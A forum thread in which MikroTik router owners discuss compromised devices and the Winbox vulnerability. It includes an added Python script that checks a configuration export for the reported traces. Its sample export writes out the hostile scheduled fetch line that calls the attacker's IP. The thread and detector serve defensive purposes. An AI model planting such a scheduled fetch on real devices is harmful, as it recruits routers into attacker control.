prozak
newbie
Topic Author
Posts: 45
Joined: Sat Jan 16, 2010 4:01 am

new vulnerability?

Mon Jul 23, 2018 12:55 am

Hello all.

I've noticed on several routers I have that there's a new vulnerability affecting versions 6.41.3 mostly; I'm not sure before 6.42.6 though.

The attack involves the creation of a schedule and a script fetching a /mikrotik.php every 30 secs under this IP: 95.154.216.160
Has anyone noticed the same?
Is MikroTik aware of this?
 
msatter
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: new vulnerability?

Mon Jul 23, 2018 1:12 am

Also the same in this topic.

viewtopic.php?f=2&t=137126
 
rjickity
Member Candidate
Posts: 212
Joined: Sat Jul 17, 2010 10:40 am
Location: Perth, Australia

Re: new vulnerability?

Mon Jul 23, 2018 1:26 am

Yes, this is the Winbox vulnerability from April. You must patch to current, as it was fixed in 6.42.1.

About 26 hours ago I had a router exploited and it left the same traces (SOCKS enabled, filter rule position 0 allowing Winbox, script fetching that PHP file on schedule). It seems very much like someone preparing a botnet.
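
The three traces listed in the post above (SOCKS enabled, a Winbox accept rule at filter position 0, a scheduled fetch script) can be looked for in a configuration export. The following Python script is an added example, not part of the original thread; the export text is constructed, and the Winbox port 8291 (the default) and the one-menu-path-per-line export layout are assumptions.

```python
import re

# Constructed sample of a RouterOS configuration export (not from a real device).
# The script body is invented; only the IP and path come from the thread.
SAMPLE_EXPORT = r"""
/ip firewall filter
add action=accept chain=input dst-port=8291 protocol=tcp
add action=drop chain=input in-interface=ether1
/ip socks
set enabled=yes
/system scheduler
add interval=30s name=sched1 on-event=script1
/system script
add name=script1 source="/tool fetch address=95.154.216.160 src-path=/mikrotik.php mode=http"
"""

def parse_export(text):
    """Group export lines by menu path, joining backslash-continued lines."""
    sections, path = {}, None
    text = re.sub(r"\\\r?\n\s*", "", text)
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("/"):          # assumption: menu path on its own line
            path = line
            sections.setdefault(path, [])
        elif line and path and not line.startswith("#"):
            sections[path].append(line)
    return sections

def find_indicators(text):
    """Return the traces from the thread that are present in an export."""
    s, hits = parse_export(text), []
    if any(re.search(r"\benabled=yes\b", l) for l in s.get("/ip socks", [])):
        hits.append("socks-enabled")
    rules = s.get("/ip firewall filter", [])
    if rules and "action=accept" in rules[0] and "chain=input" in rules[0] \
            and re.search(r"dst-port=\S*\b8291\b", rules[0]):  # 8291: default Winbox port
        hits.append("winbox-accept-at-rule-0")
    fetchers = set()                      # names of scripts that call fetch
    for l in s.get("/system script", []):
        m = re.search(r"\bname=(\S+)", l)
        if m and "fetch" in l:
            fetchers.add(m.group(1).strip('"'))
    for l in s.get("/system scheduler", []):
        ev = re.search(r"\bon-event=(\S+)", l)
        if "fetch" in l or (ev and ev.group(1).strip('"') in fetchers):
            hits.append("scheduled-fetch")
            break
    return hits

if __name__ == "__main__":
    print(find_indicators(SAMPLE_EXPORT))
```

A hit on any of these is a reason to inspect the device by hand; an empty result does not show that a router is clean.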
 
msatter
Forum Guru
Posts: 2897
Joined: Tue Feb 18, 2014 12:56 am
Location: Netherlands / Nīderlande

Re: new vulnerability?

Mon Jul 23, 2018 1:46 am

If it is that vulnerability then it is also fixed since RouterOS version: 6.40.8 and 6.43rc4
 
vecernik87
Forum Veteran
Posts: 882
Joined: Fri Nov 10, 2017 8:19 am

Re: new vulnerability?  [SOLVED]

Mon Jul 23, 2018 2:36 am

The April vulnerability (or more like the person/group/entity mass-misusing it) was typical with downloading an "update.aspx" page. If this one uses mikrotik.php, it is likely to be a different attacker, who is most probably (but not certainly) using the same vulnerability.

Thanks for sharing.
 
chechito
Forum Guru
Posts: 2990
Joined: Sun Aug 24, 2014 3:14 am
Location: Bogota Colombia

Re: new vulnerability?

Mon Jul 23, 2018 2:59 am

> Hello all.
>
> I've noticed on several routers I have that there's a new vulnerability affecting versions 6.41.3 mostly; I'm not sure before 6.42.6 though.
>
> The attack involves the creation of a schedule and a script fetching a /mikrotik.php every 30 secs under this IP: 95.154.216.160
> Has anyone noticed the same?
> Is MikroTik aware of this?

Please don't misinform people with these topics.